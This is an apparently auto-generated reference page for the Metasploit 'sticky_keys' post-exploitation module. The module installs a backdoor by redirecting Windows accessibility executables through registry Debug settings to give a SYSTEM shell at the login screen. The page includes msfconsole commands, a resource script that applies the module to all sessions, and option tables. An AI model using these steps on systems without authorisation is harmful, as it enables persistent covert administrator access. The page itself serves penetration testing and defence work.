Sticky Keys Persistance Module - Metasploit


This page contains detailed information about how to use the post/windows/manage/sticky_keys metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Sticky Keys Persistance Module
Module: post/windows/manage/sticky_keys
Source code: modules/post/windows/manage/sticky_keys.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting for certain executables. The module options allow for this hack to be applied to: SETHC (sethc.exe is invoked when SHIFT is pressed 5 times), UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U), OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P). The hack can be added using the ADD action, and removed with the REMOVE action. Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded to the target prior to running the module. By default, a SYSTEM command prompt is installed using the registry method if this module is run without modifying any parameters.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/manage/sticky_keys

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/manage/sticky_keys
msf post(sticky_keys) > show options
    ... show and set options ...
msf post(sticky_keys) > set SESSION session-id
msf post(sticky_keys) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/manage/sticky_keys")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/manage/sticky_keys post exploitation module looks in the msfconsole:

msf6 > use post/windows/manage/sticky_keys

msf6 post(windows/manage/sticky_keys) > show info

       Name: Sticky Keys Persistance Module
     Module: post/windows/manage/sticky_keys
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  OJ Reeves

Compatible session types:
  Meterpreter
  Shell

Available actions:
  Name    Description
  ----    -----------
  ADD     Add the backdoor to the target.
  REMOVE  Remove the backdoor from the target.

Basic options:
  Name     Current Setting                Required  Description
  ----     ---------------                --------  -----------
  EXE      %SYSTEMROOT%\system32\cmd.exe  yes       Executable to execute when the exploit is triggered.
  SESSION                                 yes       The session to run this module on.
  TARGET   SETHC                          yes       The target binary to add the exploit to. (Accepted: SETHC, UTILMAN, OSK, DISP)

Description:
  This module makes it possible to apply the 'sticky keys' hack to a 
  session with appropriate rights. The hack provides a means to get a 
  SYSTEM shell using UI-level interaction at an RDP login screen or 
  via a UAC confirmation dialog. The module modifies the Debug 
  registry setting for certain executables. The module options allow 
  for this hack to be applied to: SETHC (sethc.exe is invoked when 
  SHIFT is pressed 5 times), UTILMAN (Utilman.exe is invoked by 
  pressing WINDOWS+U), OSK (osk.exe is invoked by pressing WINDOWS+U, 
  then launching the on-screen keyboard), and DISP (DisplaySwitch.exe 
  is invoked by pressing WINDOWS+P). The hack can be added using the 
  ADD action, and removed with the REMOVE action. Custom payloads and 
  binaries can be run as part of this exploit, but must be manually 
  uploaded to the target prior to running the module. By default, a 
  SYSTEM command prompt is installed using the registry method if this 
  module is run without modifying any parameters.

References:
  https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit
  http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html

Module Options


This is a complete list of options available in the windows/manage/sticky_keys post exploitation module:

msf6 post(windows/manage/sticky_keys) > show options

Module options (post/windows/manage/sticky_keys):

   Name     Current Setting                Required  Description
   ----     ---------------                --------  -----------
   EXE      %SYSTEMROOT%\system32\cmd.exe  yes       Executable to execute when the exploit is triggered.
   SESSION                                 yes       The session to run this module on.
   TARGET   SETHC                          yes       The target binary to add the exploit to. (Accepted: SETHC, UTILMAN, OSK, DISP)

Post action:

   Name  Description
   ----  -----------
   ADD   Add the backdoor to the target.

Advanced Options


Here is a complete list of advanced options supported by the windows/manage/sticky_keys post exploitation module:

msf6 post(windows/manage/sticky_keys) > show advanced

Module advanced options (post/windows/manage/sticky_keys):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/manage/sticky_keys module can do:

msf6 post(windows/manage/sticky_keys) > show actions

Post actions:

   Name    Description
   ----    -----------
   ADD     Add the backdoor to the target.
   REMOVE  Remove the backdoor from the target.

Evasion Options


Here is the full list of possible evasion options supported by the windows/manage/sticky_keys post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/manage/sticky_keys) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The current session does not have administrative rights.


Here is a relevant code snippet related to the "The current session does not have administrative rights." error message:

96:	  #
97:	  # Runs the exploit.
98:	  #
99:	  def run
100:	    unless is_admin?
101:	      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
102:	    end
103:	
104:	    print_good("Session has administrative rights, proceeding.")
105:	
106:	    target_key = get_target_exe_reg_key

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • OJ Reeves

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.